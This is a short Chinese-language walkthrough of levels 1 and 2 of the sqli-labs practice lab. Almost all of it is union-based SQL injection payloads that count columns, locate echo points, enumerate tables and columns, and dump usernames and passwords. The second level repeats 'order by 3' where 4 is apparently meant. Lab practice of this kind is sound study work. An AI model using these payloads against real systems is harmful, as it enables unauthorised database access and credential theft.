sqli-liabs通关之旅
第一关
加‘报错
加‘--+正常
?id=-1' order by 3 --+ 页面正常
?id=-1' order by 4 --+ 页面错误 判断字段长度为3
确定回显点:
id=-1' union select 1,2,3--+
猜数据库:
-1' union select 1,database(),3--+
猜表名:
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
猜列名:
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
猜用户数据:
id=-1' union select 1,group_concat(username,password),3 from users--+
第二关
and 1=1 正常
and 1=2 报错
?id=-1 order by 3 页面正常
?id=-1 order by 3 页面错误 判断字段长度为3
确定回显点:
id=-1 union select 1,2,3
猜数据库:
-1 union select 1,database(),3
猜表名:
-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
猜列名:
-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
猜用户数据:
id=-1 union select 1,group_concat(username,password),3 from users